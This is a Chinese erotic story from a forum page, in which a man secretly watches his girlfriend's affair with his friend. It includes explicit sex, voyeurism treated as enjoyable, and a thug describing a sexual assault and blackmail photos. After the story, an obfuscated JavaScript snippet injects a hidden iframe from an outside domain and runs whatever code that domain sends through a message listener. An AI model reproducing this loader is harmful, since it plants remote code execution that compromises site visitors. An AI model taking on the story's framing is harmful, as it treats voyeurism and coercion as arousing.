【女友纪实】【完】
    时间:2021-05-01 23:53:34

    女友纪实

      (一)相片

      「……我忘记带钥匙了,那我先住在大龟家好了,等你回来我再去找你……自己小心了……嗯……拜!」我失望地跟女友告别,挂掉电话。

      凡事就是有那幺巧合,本来向公司请了几天假,打算偷偷上来台北,让女友有一个惊喜,谁知到了火车站打给女友时,她反倒到了台中参加研讨会。这下好了,人生地不熟的,又忘记带上女友住处的钥匙,还好大龟可以提供我一个临时休息的地方。

      叫了计程车到大龟的住处,从电话中大龟告诉我的,在门口鞋柜中拿出备用钥匙。

      「今天你自己随便吃一吃,趁着可怡不在你身边,晚上我再介绍几个妹让你认识。就这样,我先上班了……」大龟在电话中说着。

      「你忙吧,我自己来就行了。」我边啃着冷掉了的三明治,边和大龟通着电话。

      可怡,也就是我的女友,外表虽不是特别艳丽,但甜甜的笑容却是最吸引我的地方,大学毕业后,就考上北部的学校当上老师,而我必须回南部工作,也因此展开了我们的远距离恋爱。

      陈规鸣,绰号大龟,我和可怡的大学同学,也是我的死党之一,为人还算风趣幽默,不过因为太花心了,可怡和他倒是不太对盘,每次两人讲不到几句话就吵了起来,害我被夹在中间当双方的出气桶。

      女友及好友都必须上班,我只好从电视柜的抽屉中拿出几片DVD来打发时间也算过得去。当我要把花了一下午时间看完的《蜘蛛人3》及《惊奇四超人》

      收进抽屉时,抽屉却卡住合不上,嘿嘿,任谁都知道这抽屉底层有玄机,等我拿出仔细一看,原来是一本相簿,我迫不及待地打开来。

      只见一个绑马尾的娇小女生,面向着墙壁,看样子是大龟新交的女友,还在娇羞着,想必这就是自拍吧!大龟真有办法,能让交往过的每个女友都对他服服贴贴的,不像可怡,当初说要拍她时,还大骂我变态。

      不知女生相貌如何?翻开下一页,只见女生的横条纹上衣只扣上一颗钮扣,素色的白色内衣稍微可见,白嫩的肌肤下虽不见女生全貌,但笑容下有着一道浅浅的乳沟,那平坦的小腹和小小的肚脐互相影衬着,我想应该是一位可爱的女生吧!

      看着这个女生小小的性感裸露,更平添了无限想像的空间,不知她的面貌如何?不知在床上的表现是否会像只小野猫?不知包覆在内衣下的两颗小丰桃是否鲜嫩欲滴?

      可惜的是虽然相簿一大本,但相片就这几张,任凭我再怎幺东翻西找,除了找到几件女性的衣物及卫生用品外,就没别的裸露照了。大龟的卧房则是锁着进不去,我只好再回客厅对这些照片回味再三。

      到了晚上和大龟及他的多位辣妹同事用餐时,我再三的寻找,仍都找不出符合照片上的女生,看样子那照片上的女生大概又是大龟的一段感情过客罢了。

      (二)被原谅的背叛

      这天因为火车误点的关系,大龟和我来到火车站接可怡时已经是晚上11点了。或许是太久没见面的关系吧,可怡一见到我时还显现出刚恋爱时的娇羞,嘟着小小的嘴巴,连头都不太敢抬,若不是大龟在场,我肯定会把可怡抱入怀中。

      「唉呦!可怡姐好久不见了,人也越来越漂亮了,我跟阿宗说说看,阿宗做你的大老公,我当你的小情郎,如何呢?」大龟果然一见面就没好话,当我的面吃起可怡的豆腐了。

      本想说可怡一定会给大龟脸色看,想不到可怡听到这些话,头更低、脸更红了。

      看到可怡害羞的样子,我终究是忍不住低下头快速往可怡的脸瞅了一下,然后急忙打圆场说:「大龟你就不要再开可怡玩笑了,难得可怡退一步,不再像以前一样和你吵架,你也就让让可怡吧!」

      「是!是!是……可怡姐大人有大量,原谅小的又说错话了,小的给你赔不是,大小姐请让小的为你服务,请进。」大龟难得听我的建议,边开着车门边对可怡打躬作揖的说。

      可怡看到大龟搞笑的语气和模样,终于「噗嗤」一声的笑了出来,这才挽着我的手坐进车里。

      一路上大龟很快的故态复萌,尽是开着可怡的玩笑,一下说:等等换他坐后座,他也想让可怡搂着他的臂膀;一下说:他开车很累,要可怡帮他全身按摩。

      可怡听到这些话,倒也不像以前求学时那幺生气了,只是一直嘟着嘴巴,脸红红的说不出话来,而我也乐得轻松。大龟说的话就那个调调,我本来就不在意的,女友也不知为什幺,这次不再和大龟作对头,这下我更不用在好朋友和女友之间当夹心酥。

      等到可怡租屋处时,或许是研习一整天加上空等火车所带来的疲惫,等我和大龟道别后再上楼时,可怡已经整个人窝在床上睡着了,而此刻的我只能坐在床沿看着睡的香甜的女友,看那细细的弯眉、微翘的红唇、听那伴随着胸脯一上一下的呼吸声,更爱看女友侧躺时,那雪白双峰所夹成的乳沟,我想这也是另一种独醒的幸福吧!

      看着女友熟睡中的我,发现女友刚带回来的行李还放在一旁,『我来帮她收一收吧!』我心想着,并开始把里面的衣物拿出来整理。

      「哇!」正当拿出衣服时,粗心的我不小心让可怡放在袋子里的手机掉在地上了,我忍不住发出一声轻呼。还好没把手机摔坏,正把手机捡起来时,刚巧手机掉到地上时不小心碰撞到讯息键,手机银幕上出现了可怡的讯息送件箱,而可怡寄出的讯息,居然大部份都是寄给大龟。

      他们不是一直不合吗?为什幺可怡会寄那幺多的讯息给大龟呢?在好奇心的驱使下,我还是偷偷打开了可怡寄给大龟的讯息。

      「小公公,我到台中了,你要听话,不准乱跑喔!」光看完第一则,就已经让我傻眼了,女友居然用撒娇的语句称呼大龟为小公公。

      「小乖乖很想你欸!可是你也知道这天不能陪你了,以后一定会好好补偿你的。」看传送日期,都是可怡到台中这天传送给大龟的,接下来的几则,我早已无心思再看下去,心里只有一个想法,我一定要把事情查明白。

      隔天,我马上编了一个藉口说必须马上回高雄,到了火车站,确定可怡离开了,我马上租了一台摩托车,先是漫无目的的到处绕绕,到了傍晚4点多才回转到可怡住处对面的小公园等待,打算来个守株待兔。

      到了晚上才见到大龟的车开到巷子口停了下来,可怡果然也在大龟的车上。

      『可怡应该是下班时恰巧遇到大龟的吧,朋友之间吃一下饭、搭一下便车也不是什幺大不了的事。』我的心里还是这样的说服自己。

      只见大龟和可怡两人从巷子口慢步地往可怡的租屋处走来,为了不被发现,我只好躲在公园的一块小土坵后。

      过没多久,正想探头出来看看他们是否已经分别时,却见大龟和可怡早已在门口紧紧地拥吻在一起,直到有其他住户开门出来时,可怡才把大龟推开依依不舍的进门去。

      看到这一幕的我,心脏像是被一把刀刺中的疼痛着,心里也开始怀疑着昨晚可怡脸红的原因是因为见到我,还是因为见到大龟?正想冲出去拦住大龟,问清楚怎幺回事时,往前跨的脚步突然被一声脏话拉回。

      「干XX,就是那个男的破坏了我的好事,不过,那女的身材真好,尤其是那对香乳,才捏了几下,口中说不要,奶头还不是硬起来!我手一摸到那骚穴,整个已经湿到不行,本想先拍照以后可用来威胁,到时又多一个床上玩物,可惜才拍了两张照,连上都还没上,她男友就来了,还好我跑得快,以后一定要再找机会报复他们才甘心。」

      原来说话的人躲在小土坵前的石桌旁中,我忍不住偷瞄了一眼,发现人像是个混混,已经喝了不少酒,更奇怪的是双眼正直盯着大龟看。

      「算了,人家没报警抓你已经算你运气好了。」只见另一名小混混的人淫笑轻佻的边看着手机边说着。

      『他们和大龟、可怡有什幺过节吗?拍什幺照?手机里有什幺呢?』我心里纳闷着。

      见大龟离开,那两个混混也起身去上厕所,看他们步履躝跚的样子,应该都醉了七、八分吧,好奇心的驱使下,我偷偷的跑去看他们放在石桌上的手机,果然还是在相片模式中。

      这……没错,照片上确实是女友,只是女友的脸上却是充满惊恐的表情;另一张看得出来女友的衣服已被这些小混混脱掉,女友只好用棉被包着,却也微露出细致的双肩。

      『那些混蛋竟是如此的可恶,王八到家了!』我心里恶狠狠地咒骂着,我边把照片删掉,却也终于惊觉到可怡几个月前打电话给我时,总是哭哭啼啼的说她被一个混混骚扰,当时的我为了一笔生意,压力颇大,加上以为可怡口中的骚扰只是被口语调戏,所以没有多加理会,想不到可怡竟是受到了这幺大的委屈。

      从那些混混之前的对话及眼神看来,我想当时应该是大龟适时救了可怡。是啊!惊醒的我突然只觉得一切都怪我的不贴心,我不能及时保护可怡,就连最基本的关心都做不到,我想我才是把可怡推往大龟的推手,我怎能怪罪到可怡和大龟的背叛呢!

      就这幺的心念移转,也让我对于可怡和大龟的背叛有那幺一点点的释怀。

      (三)春宫秀

      接下来的我向公司请了一个月的长假,不过我并不是去找大龟和可怡摊牌,而是听到那两名混混说要报复大龟和女友而担心着,可是我又不能直接了当的对大龟和女友说,所以只能先留在这里暗地里保护女友的安全。

      这天早上,只见女友出现在租屋楼下,在暖暖的阳光下,一头微湿卷亮发型的女友显得那样的年轻俏丽,当时的我,有多幺的冲动想跑出去抱住女友,可惜的是我知道女友等的不是我。

      果然没多久就见到大龟出现在巷子口,女友一见到大龟,就迫不急待的就向前走去牵着大龟的手,似乎在诉说着她昨晚有多幺想念大龟。看着他们俩有说有笑地离去,我心里同时出现一点点的惆怅和欣慰,惆怅的是不知女友心中是否还有我这位正牌男友的地位;欣慰的是女友孤单时有人可以依靠,让我真的替女友感到高兴。

      女友被大龟载去上班后,闲着无事的我也只能漫无目的到处逛了一个上午。

      不知不觉中已经从女友的住处逛到大龟家,正当想离开时,突然听到大龟家的客厅似乎发出一些声响。

      『大龟明明在上班,为什幺会有声音呢?不会是两个混混已经偷潜入大龟家中,要等大龟回来对他不利吧?』我心里恐惧的想着,为了保护可怡和大龟,我壮大胆子从大龟的鞋柜中拿出预备钥匙,小心翼翼的开了门。

      「呼~~」我忍不住松了一口气,原来是厨房的后门忘记关,有一只猫趁隙跑进来捣乱,花了我好久的时间,才让猫从二楼房间的阳台跳出去。等我回过神来,才发现猫跳出去的房间就是上次大龟锁起来的卧房。

      当我大略瞄了一眼,正如当初我想像的一样,房间中到处都摆放着女性的衣物及饰品,我想不用猜也知道是我女友可怡的;床头还放着一本相簿,照片中都是大龟和可怡出去玩的恩爱情景,我想大龟是怕被我发现,所以当我来找他时,他应该有事先回来把房门锁上吧!

      正当我还沉溺于自己的思绪中时,突然从楼下传来几句对话声,『不会那幺巧吧?大龟在这时候回来。』我心想。

      我快速走到阳台外,藉由房里的窗帘遮住了我的身影,透过细缝注意房里,只希望大龟不会进房,免得我被发现。

      然而天总是不从人愿,而且听声音还是两人朝房间走过来。

      「你不知道人家在学校很忙啊,还叫人家请假回来陪你吃饭。」没错,说话的正是我的女友,可怡。

      「没办法嘛,陈组长说太久没看见你这位大美女,就缠着我一定要找你出来一同吃顿饭。」大龟说着。

      「陈组长会想我,就只有你不想我。」可怡嘟着嘴反驳。

      「当然想啊!我女友那幺可爱,让我早也想、晚也想,尤其是我女友身上的奶香味,让我最着迷了。」大龟边说着,双手也不安份地解开可怡身上针织衫的钮扣,不一会儿可怡就露出了里面的白色蕾丝内衣。

      「不要闹了啦!人家还要换衣服,不然吃饭会来……嗯……不及……」可怡还没说完话,大龟就吻上了可怡的唇。可怡其实是很容易动情的人,果然没过多久,可怡已双眼迷蒙,翘着脚尖回应着大龟的深吻。

      大龟的吻慢慢地从可怡的唇下滑到可怡细嫩的脖子,可怡身上穿的粉色针织衫也被大龟脱掉丢在地上,露出白嫩滑溜的上半身,只靠着那白色内衣覆盖在那对娇乳上。

      大龟一手缠住可怡的腰身,一手熟练地把那上身的唯一遮掩物,也就是可怡的内衣解下,可怡的乳房瞬间绷跳了出来。大龟一下找到了那已经坚挺的乳头,伸出舌头开始吸舔着,「唔……公公……好……好……舒服……」随着大龟吸得越大力,可怡的呻吟也越大声。

      大龟吸着可怡的娇乳,双手也慢慢地褪下了可怡的裙子与内裤,可怡露出那如玉笋般的双腿,大腿根处却是与洁白双腿反衬的一片黑森林,而那黑森林上已沾附着珠珠的水滴,原来可怡的淫水早已潺潺流出了。

      「唔……啊……啊……啊……公……公,再……进去一点……」可怡用几乎是气音的声音说着,原来大龟的双指已抽插着可怡的小穴:「噗滋、噗滋……」大龟一听这话,更是加强了手抽插的力道及速度,看样子是可怡的小穴流出了不少的淫水,才能发出那样的声音。

      大龟看可怡已完全沉浸在性爱中,趁空迅速把自己身上的衣物解下,露出昂首朝天的阳具,那条巨虫果然型如人名,让我在心中暗自比较都自叹弗如。大龟顺势让可怡趴在床缘,翘起臀来露出已淫水潺潺的阴户,一下就把那条青筋暴露的巨蛇插进女友的小穴中。

      「啊……啊……啊……好爽……公……公……好爽……唔……」女友终于毫无保留地大声呻吟,臀部也随着抽插节奏一前一后地迎合大龟的巨大阳物而发出「啪啪啪」的声响。

      亲眼看见女友和别人做爱的我,却一点也不想去阻止他们,因为我这是我第一次见到可怡跟别人做爱时的淫荡神态,淫靡的表情、勾人慑魂的呻吟声、随着性爱节奏扭动的身躯,让我只能一动也不动的静静观看着,深怕一出声就破坏了这画面。

      鱼水交欢的缠绵终于在四十几分钟后结束,大龟也在可怡的粉嫩细致的小穴外射出了白浊的精子。两人躺了一下才起身穿好服装,出门参加同事的饭局。

      「咳咳!你也该出来了吧?」

      正当我还沉浸在刚刚的性爱飨宴中时,房间中突然出现的人声硬是把我从幻想中拉回现实世界。我往房间内一看,哇咧!差点吓到心脏跳了出来,那不是在公园看到的两个混混之一的年轻混混正硬挺挺的站在床头吗?

      「小哥,想不到你也跟踪到这里来了,之前在小公园那边我也注意到你躲在另一边偷看,想不到你能找到这里,真是相当有心。」年轻混混对着我说。

      「呵呵,那个妞我一眼看到就马上被她迷住了,所以……嘿嘿!」我顺着年轻混混的语意说着。看样子,我是被误会成跟踪及偷窥的好色之徒了。

      「小哥你的眼光不错,一眼就看上了我大哥的猎物。」年轻混混说。

      「没啦!不敢,不敢,我今天只是一时意乱情迷,看到后门没关就闯了进来的,大哥看上的女人我不敢抢啦!」我编着谎言说着。

      「想不到你能从我偷开的门进来,也算是大家有缘,才能一同看到这场春宫秀。」年轻混混边说边模仿可怡被干的表情。

      「呵呵,你模仿得倒是蛮恶心的!」看到年轻混混的搞笑神情,我紧张心情顿时轻松不少,也开起他的玩笑。

      「说得也是,还是又白又嫩的可怡老师才能让人想入非非。」年轻混混说。

      「咦,你知道这个她的名字啊?」我惊讶地问着。

      「是啊!她是我的国中老师,之前我和大哥偷窥的那天晚上,看到可怡老师我就有点眼熟了,只是那天喝太醉了,所以没能记起来。后来,我又偷偷跟踪过几次可怡老师,才知道她大部份时间都住在她男朋友这里。今天也是和你一样逛到这里,想到可怡老师的香嫩胴体,忍不住色性便偷偷跑了进来,想不到意外看到一场精彩的春宫秀。」年轻混混说。

      「好了,我们出去再说吧,在这里待太久不好。」我压抑着惊讶说着。

      原来小混混绰号叫做蚊子,刚从国中毕业两年而已,可怡就在他九年级时教过他。蚊子毕业之后就在讨债集团当打手,也刚巧就在小公园偷窥的那天晚上,他们在路上遇到了以前的仇家,两方爆发冲突,蚊子的大哥(用手机拍摄可怡的中年混混)被打成植物人,蚊子则侥幸仅受皮肉伤,所以有点觉悟,又想起可怡以前在学校对他的教诲,才让蚊子脱离黑道,打算到机车店当学徒。

      得知中年混混受伤变植物人的消息之后,可怡人身安全的顾虑也消失了,我没待多久便销假回公司上班了。至于大龟和可怡呢?我是抱持着随缘的态度,毕竟就某部份来说我算是自作自受,『一切等可怡转调到南部教书,他们两个应该会自然而然就结束吧!』我心想(苦笑)。

      (待续)

      全文66072字节
    [ 此帖被逍遥大圣在2013-03-16 22:46重新编辑 ]

    eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};